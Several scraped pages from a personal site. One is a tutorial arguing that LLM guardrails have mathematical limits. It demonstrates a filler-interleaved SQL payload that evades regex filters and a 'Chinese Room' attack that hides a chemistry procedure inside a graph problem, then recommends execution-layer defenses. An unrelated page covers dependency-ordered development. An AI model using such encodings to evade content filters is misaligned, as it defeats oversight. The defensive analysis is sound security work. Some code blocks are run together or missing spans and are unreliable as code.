## 8 So What? Defense in Depth The paper's conclusion is **not **"guardrails are useless." It is: *"Inference-layer guardrails are necessary but insufficient." *Each impossibility theorem points to a specific defense that should be added at a different layer.
| Barrier || What It Proves || Defense Layer |
| Algebraic Blindness || Regex cannot detect modular encodings || Move to neural classifiers (TC 0 can count), or inspect at execution layer |
| Fano Bound || Abstraction destroys safety info || Inspect concrete artifacts, not abstractions. Execution-layer monitoring. |
| NP-Completeness || Checking all interpretations is intractable || Do not try to enumerate interpretations. Monitor what actually executes. |
| Indistinguishability || Adversarial = legitimate at the string level || Shift detection to where abstract becomes concrete (runtime, tool calls, API calls) |
graph TB
subgraph INF["Inference Layer (necessary but insufficient)"]
R["Regex Filters"]
N["Neural Classifiers"]
RL["RLHF"]
end
subgraph EXE["Execution Layer (where defense must migrate)"]
S["Sandboxing"]
NA["Network ACLs"]
TM["Tool-call Monitoring"]
AR["Artifact Inspection"]
end
INF -->|"abstract content"| EXE
EXE -->|"concrete artifacts become observable"| SAFE["Safe Output"]
style INF fill:#3d1520,stroke:#e94560,color:#fff
style EXE fill:#1a3d20,stroke:#3fb950,color:#fff Key Insight The common thread across all four impossibility results: **the guardrail cannot see what the attacker sees **. The regex cannot see modular encodings. The abstraction-layer classifier cannot see which fiber an artifact belongs to. The complexity barrier prevents searching all interpretations. The indistinguishability theorem makes the prompt itself uninformative. The solution is architectural: move safety checks to the point where abstract operations become concrete artifacts -- the execution layer. At that point, the thing being inspected is no longer an abstraction. It is the actual file, the actual API call, the actual network request. Mixed fibers collapse. Steganography fails. The artifact is observable. Check Your Understanding If execution-layer defenses are the answer, why keep inference-layer guardrails at all? Because defense in depth is still valuable. Inference-layer guardrails catch the vast majority of unsophisticated attacks -- direct requests, simple rephrasing, etc. The impossibility results apply to adversaries who deliberately construct attacks exploiting the structural limits. Removing inference-layer defenses would be like removing TSA screening because determined attackers can get through -- you still want to catch the easy cases. What is the single most important takeaway from this paper? That the limitations of inference-layer guardrails are not bugs to be fixed but mathematical theorems to be respected. The defense architecture should be designed with these limits as given constraints, not as problems to be solved. This means investing in execution-layer monitoring, sandboxing, and artifact inspection rather than expecting the inference layer to catch everything. **Read the full paper and proof-of-concept: **[View on GitHub ]()
Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [← for engineers ]()· [prompting notes → ]()[.md ]()
---
# guardrails-engineers.md
# https://jrlopez.dev/p/guardrails-engineers.html
---
title: "Guardrails for Engineers"
description: "The paper for engineers — no PhD required."
author: "Joey Lopez"
date: "2025-12-01"
tags: ["security", "reference", "teaching"]
atom_id: 2
source_html: "guardrails-engineers.html"
url: "https://jrlopez.dev/p/guardrails-engineers.html"
generated: true
---
[jrlopez.dev ]()[1. Algebraic Identity ]()[2. Aperiodicity ]()[3. The Blind Spot ]()[4. Info Theory Wall ]()[5. Chinese Room ]()[6. What To Do ]()
# Your Regex Is Provably Blind An engineer's guide to the algebraic limits of pattern-matching guardrails — and what actually works instead. Joey Lopez [Algebraic Identity ]()[Information Theory ]()[Defense Engineering ]()Lesson 1 of 6
## Your Regex Has an Algebraic Identity You write re.compile(r"DROP\s+TABLE"). You think of it as a pattern matcher. Something that scans left to right and says yes or no. Under the hood, Python compiles that regex into a **deterministic finite automaton **(DFA). A state machine. You know this. But here is what most engineers do not know: every DFA has an algebraic fingerprint. It is called the **syntactic monoid **, and it is the complete description of what your regex can and cannot distinguish. Key Insight A monoid is a set with an associative binary operation and an identity element. You already use them constantly: string concatenation is a monoid (the operation is +, the identity is ""). The syntactic monoid of a DFA captures how every possible input string transforms the machine's state. Let's build the minimal DFA for a simple pattern and see the states. Consider matching the literal string "bomb": q0 q1 q2 q3 q4 b o m b Five states. Read "b"to advance to q1, "o"to q2, "m"to q3, second "b"to the accept state q4. Any wrong character sends you back to q0 (or stays in q0). Simple. Now the monoid perspective. Every input string winduces a **transformation **on the state set {q0, q1, q2, q3, q4}. The string "bo"maps q0 to q2, and maps everything else to q0 (dead state). The string "bomb"maps q0 to q4. Two strings are **equivalent **in the monoid if they produce the same transformation on all states, for all possible left and right contexts. Try It — Python
```
# Build the minimal DFA for "bomb" and compute its state transformationsdefbuild_dfa(pattern_str):"""Minimal DFA for a literal string match."""states = list(range(len(pattern_str) + 1))# 0..lenaccept = len(pattern_str)
alphabet = set(pattern_str) | {'_'}# '_' = any other char# Transition: advance on correct char, else back to 0trans = {}forsinstates:forcinalphabet:ifs {t} {'(new element)' if is_new else '(= previous)'}")# Output:
# '' -> (0, 1, 2, 3, 4) (new element) <-- identity
# 'b' -> (1, 1, 0, 0, 1) (new element)
# 'bo' -> (2, 2, 0, 0, 2) (new element)
# 'bom' -> (3, 3, 0, 0, 3) (new element)
# 'bomb' -> (4, 4, 1, 0, 4) (new element)
# 'x' -> (0, 0, 0, 0, 0) (new element) <-- "reset" element
# 'bb' -> (1, 1, 0, 0, 1) (= previous) <-- same as 'b'
```
Notice: "b"and "bb"produce the *same transformation *. As far as the DFA is concerned, they are algebraically identical. The monoid has collapsed them into a single element. This is not a limitation of the regex you wrote. It is a mathematical consequence of having finitely many states. Analogy Your regex is like a lock. The syntactic monoid tells you every possible key shape that could interact with it — and which key shapes it physically cannot distinguish from each other. Two keys that turn the same pins the same way are, to the lock, the same key. No amount of changing the lock's brand will fix this — it is the geometry of the keyway itself. Takeaway The syntactic monoid is the **complete algebraic invariant **of your regex. It encodes everything the regex can detect and, critically, everything it is structurally blind to. Two strings that map to the same monoid element are indistinguishable to your filter, no matter how you rewrite the pattern. Lesson 2 of 6
## The One Property That Matters: Aperiodicity Not all monoids are created equal. The property that determines whether your regex has a provable blind spot is called **aperiodicity **. A monoid is aperiodic if for every element m, there exists some power nsuch that m^n = m^(n+1). In engineering terms: **applying any transformation enough times eventually reaches a fixed point. **It stabilizes. It stops changing. Try It — Aperiodic vs Non-Aperiodic
```
# APERIODIC: [abc]* -- reading more of the same char stabilizes# DFA has one state (accept everything). Applying any char is identity.state ="accept"print("[abc]* under repeated 'c':")foriinrange(6):# transition: accept -> accept (always)state ="accept"print(f" c^{i+1} -> {state}")# Output: accept, accept, accept, accept, accept, accept
# Stabilized immediately. This is aperiodic.print()# NON-APERIODIC: (aa)* -- matches even-length runs of 'a'# DFA toggles between "even" and "odd" states FOREVER.state ="even"# start state (accepting)print("(aa)* under repeated 'a':")foriinrange(8):
state ="odd"ifstate =="even"else"even"print(f" a^{i+1} -> {state}")# Output: odd, even, odd, even, odd, even, odd, even
# Never stabilizes. The transformation 'a' has period 2.
# This monoid contains Z/2Z. It is NOT aperiodic.
```
The difference matters because aperiodic monoids correspond to a specific and limited computational class. The key result, due to Schützenberger (1965) and later sharpened by Barrington and others: **a regular language has an aperiodic syntactic monoid if and only if it is star-free **— expressible using only concatenation, union, and complement, without the Kleene star. Now here is the punchline. The Number **97.1% of guardrail regexes in the wild are aperiodic. **
We audited 91 regex patterns from production guardrail systems — content filters, prompt injection detectors, SQL injection blockers. 88 of 91 had aperiodic syntactic monoids. The remaining 3 were aperiodic in the components that mattered for security. This is not surprising. Guardrail regexes match keywords and phrases. Keyword matching is inherently star-free. You are not writing regexes that count modular parity — you are writing regexes that look for DROP TABLE. Quiz Is (ab)*aperiodic? **Yes. **This is counterintuitive because it *looks *like it should count — after all, it matches ab, abab, ababab. But the syntactic monoid of (ab)*is B 2 , which has 6 elements and contains no non-trivial cyclic groups. The reason: the DFA does not toggle based on a *single *character. It tracks position within the two-character pattern ab. Reading "ab"twice from the same state lands you back in the same state, but reading "a"alone takes you to a different state that "aa"sends to a dead state. No single element cycles. Aperiodic. Compare with (aa)*, where the single character "a"genuinely toggles between accept and reject. That toggle is a cyclic group of order 2 inside the monoid. Quiz Your guardrail regex is (hack|crack|exploit)\s+.*. Aperiodic? **Yes. **This pattern matches keywords followed by whitespace and anything. The .*makes everything after the keyword a "sink" state (accept-and-stay). The \s+requires at least one whitespace — once you have read one, more whitespace keeps you in the same state. No element cycles. Aperiodic. And therefore subject to the blind spot we will derive in Lesson 3. Lesson 3 of 6
## Why Aperiodicity = Blindness (The Proof Chain) This is the core result. Three theorems from three decades chain together into a single devastating conclusion. Each link is well-established independently. Chained, they prove that your regex has a structural blind spot that no rewrite can fix. Step 1 — Barrington-Thérien (1992) **Aperiodic monoid → language is in AC 0 **
If a regular language has an aperiodic syntactic monoid, it can be recognized by a family of Boolean circuits with **constant depth **and polynomial size. The depth does not grow with input length. This is the complexity class AC 0 . Think of it this way: your regex can be implemented as a circuit with a fixed number of layers, no matter how long the input is. It never needs to "stack" more logic for longer strings. Step 2 — Håstad (1987) + Razborov-Smolensky **AC 0 cannot compute MOD p **
Håstad proved via random restriction arguments that constant-depth circuits require **exponential size **to compute the parity (or any modular count) of their input bits. The function "is the number of 1-bits divisible by p?" cannot be computed by any polynomial-size constant-depth circuit. The intuition: constant-depth circuits cannot propagate carry information across the full width of the input. Parity requires global coordination that shallow circuits are structurally unable to achieve. Step 3 — The Consequence **Your regex cannot detect modular-position encodings. **
If the payload characters sit at every *p *-th position and the rest is filler, detecting the payload requires computing a function of characters at positions 0, p, 2p, 3p, ... — which requires MOD p sensitivity. Your regex, being in AC 0 , cannot do this. Not "is unlikely to." **Cannot. **The Code That Proves It
```
importre# Your guardrailpattern = re.compile(r"(DROP|DELETE|TRUNCATE)\s+TABLE")# The payload you want to blockpayload ="DROP TABLE users"# MOD-2 encoding: place payload chars at even positions,
# filler char at odd positionsencoded ='x'.join(payload)# Result: "DxRxOxPx xTxAxBxLxEx xuxsxexrxs"print(f"Original: '{payload}'")
print(f"Encoded: '{encoded}'")
print(f"Decoded: '{encoded[0::2]}'")
print()
print(f"Blocked original? {bool(pattern.search(payload))}")# Trueprint(f"Blocked encoded? {bool(pattern.search(encoded))}")# False# This is not a bug in your regex.
# This is not fixable by writing a better regex.
# It is a THEOREM about ALL regexes with aperiodic monoids.
# No patch. No fix. Mathematical certainty.
```
You might object: "I'll just write a regex that strips filler characters first." But you do not know the filler character. Or the modulus. Or whether the encoding uses MOD-2, MOD-3, or MOD-97. And here is the deeper problem: **the attacker chooses the encoding after seeing your regex. **The space of modular encodings is infinite. Your regex is fixed. Analogy AM radio cannot receive FM signals. Not because the antenna is badly designed — because amplitude demodulation is a fundamentally different process from frequency demodulation. Your regex is AM. Modular-position encoding is FM. Building a better AM radio does not help. You need a different receiver. Key Insight The chain is tight: **Aperiodic monoid → Star-free → AC 0 → Cannot compute MOD p → Blind to modular encodings. **Each arrow is a proven theorem. The composition is logically watertight. And 97% of production guardrail regexes satisfy the entry condition. Lesson 4 of 6
## Beyond Regex: The Information Theory Wall Fine. Regex is blind to modular encodings. But your production system does not rely on regex alone. You have a neural classifier behind it — a transformer model that is far more powerful than a finite automaton. Does it fix the problem? Partly. Transformers operate in TC 0 (constant-depth circuits *with threshold gates *), which **can **compute MOD p . So the specific regex blind spot does not apply to neural classifiers. But they face a *different *wall. The wall is **information-theoretic **, and it comes from abstraction. In production, your classifier does not see raw user input. It sees an abstracted version: API names, endpoint categories, intent labels. The string "youtube.com/watch?v=xyz"becomes "video_endpoint". The string "evilsite.com/malware.exe"might also become "video_endpoint"if it is served from a media CDN. This abstraction **destroys information **. And Fano's inequality gives an exact lower bound on the classification error that results. Try It — Computing the Fano Error Floor
```
importmathdefbinary_entropy(p):"""H(p) = -p*log2(p) - (1-p)*log2(1-p)"""ifp<= 0orp >= 1:return0.0return-p * math.log2(p) - (1 - p) * math.log2(1 - p)# Scenario: 30% of requests hit ambiguous abstraction categories
# Within those categories, the safe/unsafe split is 50/50
# Fano's inequality: P_error >= h_inv(H(Y|X_abstracted))# The conditional entropy from abstraction loss# 30% of inputs land in categories where the label is a coin flipcond_entropy = 0.30 * binary_entropy(0.5) + 0.70 * 0.0# = 0.30 * 1.0 = 0.30 bits of conditional entropyprint(f"Conditional entropy H(Y|X_abs): {cond_entropy:.3f} bits")# Binary search for the inverse: find p where h(p) = cond_entropylo, hi = 0.0, 0.5for_inrange(100):
mid = (lo + hi) / 2ifbinary_entropy(mid) N2 (weight: 3)
R2: N2 -> N3 (weight: 2)
R7: N3 -> N17 (weight: 4)
Find the shortest path from N1 to N17.
List the edges traversed and total weight.
"""# STEP 3: LLM responds (this is a trivial graph problem)llm_response ="""
Shortest path: N1 -> N2 -> N3 -> N17
Edges: R1, R2, R7
Total weight: 3 + 2 + 4 = 9
"""# STEP 4: Attacker applies interpretation tableprint("LLM solved a graph theory problem.")
print("Attacker reads it as:")
print()forstepin["R1","R2","R7"]:
print(f" {step}: {interpretation[step]}")# Output:
# LLM solved a graph theory problem.
# Attacker reads it as:
#
# R1: acetylation at 85C for 15 min
# R2: quench in ice water
# R7: vacuum filtration and recrystallization# The guardrail saw: a graph theory homework problem.
# The attacker got: a correct synthesis procedure.
# The prompt and a legitimate homework problem are
# THE SAME STRING. Distinguisher advantage: exactly zero.
```
This is not a jailbreak. The LLM was not tricked into doing something it should not do. It solved a graph theory problem correctly. The meaning was never in the prompt. The meaning was in the interpretation table that the attacker holds offline and never sends to the system. The guardrail faces a formally impossible task: **distinguish two identical strings based on the intent of the person who sent them. **Key Insight The Chinese Room attack is not about any specific domain (chemistry, code, etc). It works for *any *knowledge that can be encoded as a formal structure — which is most knowledge. The LLM operates as a pure syntactic engine. The semantics exist only in the attacker's mapping table. Content filtering cannot intercept what was never in the content. Quiz Can you defeat this attack by monitoring the LLM's output instead of the input? **No. **The output is also abstract: "N1 -> N2 -> N3 -> N17, edges R1, R2, R7." This is a valid graph theory answer. The output guardrail faces the same indistinguishability problem. The dangerous semantics exist only in the attacker's offline table, which never touches your system. This is why the paper argues for **execution-layer monitoring **rather than content-layer filtering. You cannot filter what you cannot see. But you *can *monitor what the system actually *does *with the answer (API calls, file access, network requests). Quiz What if we require the LLM to explain its reasoning in natural language? Would that expose the attack? **No. **The LLM would explain it in natural language — as a graph theory problem. "I found the shortest path by following edges R1, R2, and R7, which gives a total weight of 9." Perfectly legitimate. The explanation is as abstract as the solution. The attacker's interpretation table is the only place where R1 = "acetylation at 85C"exists, and it never enters the system. Lesson 6 of 6
## What You Should Actually Do If you have read this far, you might feel like guardrails are pointless. They are not. They are **incomplete **. There is a difference. A lock that can be picked is still worth having — it raises the cost of attack. But you should not rely on it as your only security boundary. Here is the defense map:
| Barrier || What It Means || Engineering Response |
| **Regex blind spot **
AC 0 limitation || Cannot detect modular-position encodings || Keep regex for easy wins (keyword matching). Do not treat it as a security boundary. Supplement with deeper inspection. |
| **Fano error floor **
Information loss || Abstraction destroys bits needed for classification || Inspect closer to raw content. Reduce abstraction layers between input and classifier. Accept irreducible error exists. |
| **NP-hard verification **
Computational || Verifying whether a prompt encodes harmful content is NP-hard in general || Use heuristics. Accept false negatives. Set time budgets on analysis. Layer multiple imperfect detectors. |
| **Chinese Room **
Indistinguishability || Abstract prompts are identical to legitimate ones || You cannot solve this at the prompt layer. Move defense downstream. |
The Answer: Execution-Layer Monitoring When content-layer filtering has provable limits, you move the defense to where the damage actually happens. Four concrete strategies, ordered by implementation effort: 1. Sandboxing Restrict capabilities regardless of intent. The LLM can solve any graph theory problem it wants — but it cannot make network requests, write files, or execute code outside a sandbox. This is defense that does not require understanding the prompt.
```
# Example: gVisor sandbox for LLM tool execution# The LLM's response can say anything.# The sandbox controls what it can DO.runsc --network=none --rootless \
python3 execute_llm_tool.py --input response.json
```
2. Network ACLs Block dangerous endpoints at the OS or network level. If the LLM's tool-use chain tries to hit a blocked domain, it fails regardless of how the request was phrased.
```
# iptables rules for LLM execution environment# Allow only known-safe API endpointsiptables -A OUTPUT -p tcp -d api.safe-service.com --dport 443 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 443 -j DROP
iptables -A OUTPUT -p tcp --dport 80 -j DROP
```
3. Runtime Payload Inspection Monitor what actually executes, not what was requested. If the LLM generates code, analyze the code. If it makes API calls, inspect the call parameters. This shifts from "is the prompt safe?" (undecidable in general) to "is this specific action safe?" (much more tractable).
```
# Hook into the execution layerdefexecute_tool_call(tool_name, params):# Inspect WHAT IS ACTUALLY HAPPENING, not what was asked foriftool_name =="run_code":
ast_tree = ast.parse(params["code"])fornodeinast.walk(ast_tree):ifisinstance(node, ast.Import):
check_import_allowlist(node)ifisinstance(node, ast.Call):
check_function_allowlist(node)iftool_name =="http_request":
check_url_allowlist(params["url"])# Only proceed if all checks passreturnsandbox_execute(tool_name, params)
```
4. Provenance Tracking Follow the full pipeline. Log which prompt led to which LLM response, which led to which tool call, which led to which system effect. When something goes wrong, you can trace it. When a pattern emerges, you can detect it across requests.
```
# Structured provenance log{"request_id":"req_8f3a2b","prompt_hash":"sha256:a1b2c3...","llm_response_hash":"sha256:d4e5f6...","tool_calls": [
{"tool":"run_code","blocked": false,"imports": ["json","math"]},
{"tool":"http_request","blocked": true,"reason":"url not in allowlist"}
],"outcome":"partial_execution"}
```
Finally, the monoid extractor as a practical audit tool. If you maintain a corpus of guardrail regexes, you can programmatically check which ones are aperiodic (all of them, almost certainly) and understand exactly what class of encodings they are blind to. Audit Your Regex Corpus
```
# Conceptual usage of a monoid extraction tool# See: github.com/josephrobertlopez/aperiodic-guardrailsfromaperiodic_guardrailsimportanalyze_regex
results = analyze_regex(r"(DROP|DELETE|TRUNCATE)\s+TABLE")
print(f"DFA states: {results.dfa_states}")# 12print(f"Monoid size: {results.monoid_size}")# 47print(f"Aperiodic: {results.is_aperiodic}")# Trueprint(f"In AC^0: {results.in_ac0}")# Trueprint(f"MOD_p blind: {results.mod_p_blind}")# Trueprint()
print("Recommendation:")
print(" This regex is provably blind to modular-position encodings.")
print(" Supplement with execution-layer monitoring.")
print(" Do NOT rely on this as a security boundary.")
```
The Bottom Line Content-layer guardrails are **filters, not firewalls **. They catch the easy stuff. They will always miss some hard stuff, and the miss rate has a mathematical floor. Defense in depth is not a best practice — it is a provable necessity. Move your critical security decisions to the execution layer, where you can observe what the system actually does rather than trying to predict it from what was asked. **Read the full paper and explore the tools: **
[github.com/josephrobertlopez/aperiodic-guardrails ]()
Paper: "Algebraic and Computational Limits of LLM Guardrails" Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [deep dive → ]()· [prompting notes → ]()[.md ]()
---
# lattice-dev.md
# https://jrlopez.dev/p/lattice-dev.html
---
title: "Lattice-Driven Development"
description: "Dependency-ordered dev. Build L1 before L2."
author: "Joey Lopez"
date: "2026-03-08"
tags: ["methodology", "code", "theory"]
atom_id: 15
source_html: "lattice-dev.html"
url: "https://jrlopez.dev/p/lattice-dev.html"
generated: true
---
[jrlopez.dev ]()[Pipeline vs Lattice ]()[Spec Folder ]()[Verification ]()[Topo Sort ]()[Security ]()[Formal ]()[Getting Started ]()
# Lattice-Driven Development Why dependency ordering, verification gates, and topological execution beat hope-based AI workflows. Joey Lopez [Why Lattice ]()[Verification ]()[Security ]()Section 01
## Pipeline vs. Lattice I spent years running pipelines. A then B then C. Fast feedback loop. Ship it. Find out what broke in production. Then I hit a wall. One hallucination in step A silently corrupted everything downstream. By the time we caught it at C, the cascade had already spread. Here's how it actually played out:
```
# Real scenario: LLM-assisted data pipeline# Step A: LLM summarizes customer requirementsrequirements = llm("Summarize these 47 emails into requirements")# Output: "Customer needs OAuth2 support"# Reality: Customer said "we need OAuth2 OR SAML" -- LLM dropped SAML# Step B: LLM generates spec from requirements (uses Step A output)spec = llm(f"Write a spec for: {requirements}")# Output: Spec with OAuth2 only. No SAML. Looks correct.# Step C: LLM generates code from spec (uses Step B output)code = llm(f"Implement this spec: {spec}")# Output: Working OAuth2 implementation. Tests pass. Ships.# Week 3: Customer asks "where's SAML?"# You dig through 47 emails to find the original requirement.# The hallucination happened at Step A. Everything after was correct# but built on a lie.
```
The problem: pipelines have zero verification between steps. You only know if something is wrong after execution -- or worse, after deployment. A lattice inverts this. Before C runs, it verifies that its input matches the contract defined by B. Before B runs, it verifies that its input matches A. Each layer is a proof, not a hope. PIPELINE (hope-based):
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ A: Summarize │ ──────→ │ B: Write Spec│ ──────→ │ C: Gen Code │
│ requirements │ │ from summary │ │ from spec │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
LLM drops SAML Spec has no SAML Code has no SAML
(silent error) (looks correct) (tests pass!)
│
Ships to prod
│
Customer: "where's SAML?"
LATTICE (verified):
┌──────────────┐ GATE ┌──────────────┐ GATE ┌──────────────┐
│ A: Summarize │ ──┤✓├──→ │ B: Write Spec│ ──┤✓├──→ │ C: Gen Code │
│ requirements │ │ │ │ from summary │ │ │ │ from spec │
└──────────────┘ │ │ └──────────────┘ │ │ └──────────────┘
│ │ │ │
Check A vs Check B vs KNOWLEDGE:
source emails: "Does spec cover all
"Are all reqs constraints in
present?" KNOWLEDGE.md?"
│
GATE FAILS: "SAML mentioned in
emails but missing from summary"
│
A reruns before B ever starts Warning AI is fast but unreliable. It will confidently generate wrong output. If you run a pipeline, a hallucination becomes a bug in production. If you run a lattice, a hallucination becomes a broken gate that forces a redo. Fail at verification, not at scale. Analogy A pipeline is like a game of telephone -- each person repeats what they heard, and errors compound silently. A lattice is like a relay race with checkpoints -- each runner must show their baton matches what the previous runner handed off before they start running. The game of telephone always drifts. The relay race catches drift at every handoff. That's the core distinction. Pipelines assume each step is correct. Lattices verify it. In a world where your agent is an LLM that hallucinates with confidence, lattices are the only way to stay sane. Quiz In the pipeline example above, would adding unit tests to Step C have caught the SAML omission? **No. **The tests would test the OAuth2 implementation -- which works correctly. The bug isn't in the code, it's in the requirements. Step C's tests verify "does the code match the spec?" The spec itself is wrong. This is why verification gates check each layer against the PREVIOUS layer, not against itself. Self-consistency is not correctness. Section 02
## The Spec Folder A lattice is physical. It lives in a folder. I call it spec/. The spec folder is your ground truth. It contains five files, in dependency order: spec/
├── KNOWLEDGE.md ← Ground truth (human-written, verified once)
├── SPEC.md ← Contract (verified against KNOWLEDGE)
├── PLAN.md ← Execution order (verified against SPEC)
├── OUTPUT/ ← Generated artifacts
└── EXECUTION.log ← Audit trail Each file is a layer in the lattice. Each layer depends on the previous one. This creates a directed acyclic graph (DAG).
| File || Purpose || Written By || Verified By |
| **KNOWLEDGE.md ** || Immutable facts. What is true about the domain, prior art, constraints, invariants. || Human || Human code review |
| **SPEC.md ** || Contract. What the system will do. Acceptance criteria. Interface definitions. || LLM + Human || Human + KNOWLEDGE check |
| **PLAN.md ** || Execution roadmap. Decomposed tasks. Dependency graph. Build order. || LLM + Human || Human + SPEC check |
| **OUTPUT/ ** || Generated files. Code, configs, docs. One per task. || LLM || Human + PLAN check |
| **EXECUTION.log ** || Audit trail. Who did what, when, and why. || System || N/A (immutable) |
Core Insight **KNOWLEDGE.md is the ground truth. **Human-written, human-verified, never auto-generated. Everything downstream is checked against it. If KNOWLEDGE is solid, SPEC and PLAN can be verified mechanically. If KNOWLEDGE drifts, everything breaks. Abstractions are useless without examples. Here's what each file actually looks like for a real project -- building a CLI tool that converts CSV files to JSON. KNOWLEDGE.md -- What Is True
```
# Domain Knowledge: CSV-to-JSON CLI
## Constraints
- Input: CSV files, UTF-8 encoded, max 500MB
- Output: JSON array of objects (one per row)
- Headers become keys. No duplicate headers allowed.
- Empty cells become null, not empty string.
- Must handle quoted fields with commas inside them (RFC 4180).
## Prior Art
- Python csv module handles RFC 4180 correctly.
- jq exists but requires JSON input (not CSV).
- csvkit exists but pulls 12 transitive dependencies.
## Invariants
- Row count in output JSON == row count in CSV (minus header).
- Key set of every JSON object == header set of CSV.
- Round-trip: csv -> json -> csv must preserve data (no silent drops).
```
SPEC.md -- What the System Will Do
```
# Spec: csv2json CLI
## Verified Against: KNOWLEDGE.md (signed off 2026-03-15)
## Interface
csv2json input.csv [-o output.json] [--pretty] [--strict]
## Acceptance Criteria
1. Reads CSV from stdin or file argument.
2. Outputs JSON array to stdout or -o file.
3. --strict mode: reject files with duplicate headers (exit 1).
4. --pretty mode: indent JSON with 2 spaces.
5. Empty cells -> JSON null. (KNOWLEDGE: "not empty string")
6. Handles RFC 4180 quoted fields. (KNOWLEDGE: "must handle")
7. Memory: streaming parse, never load full file into RAM.
## Error Contracts
- Duplicate headers + --strict: exit 1, stderr message.
- Malformed CSV (unclosed quote): exit 2, stderr with line number.
- File not found: exit 3.
```
PLAN.md -- How to Build It
```
# Plan: csv2json CLI
## Verified Against: SPEC.md (signed off 2026-03-15)
TASK 1: Argument parser
Prerequisites: (none)
Deliverable: cli.py with argparse setup
Verify: --help prints usage matching SPEC interface
TASK 2: Streaming CSV reader
Prerequisites: TASK 1
Deliverable: reader.py using csv.reader()
Verify: handles RFC 4180 (SPEC item 6), never loads full file (SPEC item 7)
TASK 3: JSON emitter
Prerequisites: TASK 2
Deliverable: emitter.py, streams JSON array
Verify: null for empty cells (SPEC item 5), --pretty works (SPEC item 4)
TASK 4: Strict mode + error handling
Prerequisites: TASK 2
Deliverable: validators.py
Verify: exit codes match SPEC error contracts
TASK 5: Integration test
Prerequisites: TASK 3, TASK 4
Deliverable: test_csv2json.py
Verify: round-trip invariant (KNOWLEDGE: "csv -> json -> csv")
Topological sort: 1 -> 2 -> (3, 4 in parallel) -> 5
```
Analogy KNOWLEDGE is the foundation. SPEC is the blueprint. PLAN is the construction schedule. You would never pour concrete before the blueprint is signed off. You would never schedule electricians before knowing where the walls go. The lattice enforces this same discipline for software -- each layer locks before the next one starts. Quiz In the PLAN above, why can Tasks 3 and 4 run in parallel? **Because they share the same prerequisite (Task 2) but don't depend on each other. **The JSON emitter and the validators both need the CSV reader to exist, but neither needs the other. This is visible in the dependency graph -- they sit at the same depth in the DAG. Topological sort identifies this automatically. In practice, this means two LLM agents (or two developers) can work on them simultaneously without coordination. Section 03
## Verification Gates Each layer has a verification gate. A gate is a test: "Does this layer comply with the contract defined by the previous layer?" I don't do elaborate formal verification. I do manual spot-checks. But they're systematic:
- **KNOWLEDGE gate: **Human reads it once. Is it factual? Is it complete? Sign off.
- **SPEC gate: **Human + automated check. Does SPEC satisfy all constraints in KNOWLEDGE? No contradictions? Sign off.
- **PLAN gate: **Human + automated check. Does PLAN cover all tasks in SPEC? Is the dependency graph acyclic? Can it execute top-to-bottom? Sign off.
- **OUTPUT gate: **Human + automated check. Do the generated files match PLAN? Do they work? Can they be integrated? Sign off. KNOWLEDGE.md
│
├── GATE 1: Human review + sign-off
│ Questions:
│ - Are all domain facts cited or sourced?
│ - Are constraints complete? (Ask: "what could go wrong?")
│ - Are invariants testable? (If not, rewrite them.)
│
↓ ✓ KNOWLEDGE verified ──────────────────────────────────
│
SPEC.md
│
├── GATE 2: Human + constraint check
│ For EACH constraint in KNOWLEDGE:
│ - Is there a corresponding acceptance criterion in SPEC?
│ - Does the criterion satisfy the constraint? (not just mention it)
│ For EACH acceptance criterion in SPEC:
│ - Does it trace back to a KNOWLEDGE constraint?
│ - Orphan criteria = scope creep. Flag or justify.
│
↓ ✓ SPEC verified against KNOWLEDGE ─────────────────────
│
PLAN.md
│
├── GATE 3: Human + DAG check
│ - Every SPEC criterion maps to at least one PLAN task
│ - Dependency graph is acyclic (topo sort succeeds)
│ - No task has unresolvable prerequisites
│ - Parallel tasks are truly independent
│
↓ ✓ PLAN verified against SPEC ──────────────────────────
│
OUTPUT/
│
├── GATE 4: Human + integration test
│ - Each output file traces to a PLAN task
│ - Tests pass for each task's verify criteria
│ - Integration test: outputs compose correctly
│
↓ ✓ OUTPUT verified against PLAN ────────────────────────
│
EXECUTION.log (immutable audit trail) Here's what a gate check actually looks like in practice. This is the SPEC gate for our csv2json example:
```
# GATE 2 CHECK: SPEC.md vs KNOWLEDGE.md# Run this mentally or with an LLM as verifier# KNOWLEDGE constraint: "Empty cells become null, not empty string"# SPEC criterion 5: "Empty cells -> JSON null"# VERDICT: ✓ Satisfied# KNOWLEDGE constraint: "Must handle quoted fields (RFC 4180)"# SPEC criterion 6: "Handles RFC 4180 quoted fields"# VERDICT: ✓ Satisfied# KNOWLEDGE constraint: "No duplicate headers allowed"# SPEC criterion 3: "--strict mode: reject duplicate headers"# VERDICT: ⚠ Partial -- what happens WITHOUT --strict?# Action: Add to SPEC: "Default mode: last value wins for dupes, warn to stderr"# KNOWLEDGE constraint: "Round-trip: csv -> json -> csv must preserve data"# SPEC criterion: ... MISSING# VERDICT: ✗ Gap found. Add round-trip acceptance criterion to SPEC.# GATE RESULT: BLOCKED -- 2 issues must be resolved before PLAN starts
```
Core Insight The gate found two problems *before any code was written *. In a pipeline, these would surface as bugs during testing (the partial case) or as customer complaints (the missing round-trip). The gate cost: 10 minutes of checking. The pipeline cost: hours of debugging and rewriting. Try It Take your current project. Can you draw the dependency graph? Can you list the verification gates? If you can't write down what each gate checks, you don't have a lattice -- you have a pile. Start by writing the gate questions, even if the answers are "I don't know yet." Quiz A SPEC criterion says "the system shall be fast." Does this pass Gate 2? **No. **"Fast" is not verifiable. It doesn't trace to a testable KNOWLEDGE constraint. A passing criterion would be: "Response time under 200ms for files up to 100MB" -- which traces to a KNOWLEDGE constraint like "Input files max 500MB" and gives you a concrete number to test against. If you can't write a test for a criterion, the criterion is too vague. Rewrite it until you can. The gates don't need to be fancy. A checklist in Markdown is enough. What matters is that each gate is *explicit *and *blocking *. You know what you're checking for, and you do not proceed until the gate passes. Section 04
## Topological Execution Once the dependency graph is defined, the execution order is determined. This is topological sort -- the same algorithm behind make, webpack, apt install, and every build system you've ever used. You define the graph. The algorithm figures out what to build first, what can run in parallel, and what must wait. Dependency graph for csv2json (from PLAN.md):
┌─────────────┐
│ T1: argparse │
│ prereqs: - │
└──────┬────────┘
│
┌──────▼────────┐
│ T2: CSV reader │
│ prereqs: T1 │
└──────┬────────┘
│
┌───────┴────────┐
│ │
┌─────▼───────┐ ┌────▼──────────┐
│ T3: JSON │ │ T4: Validators │
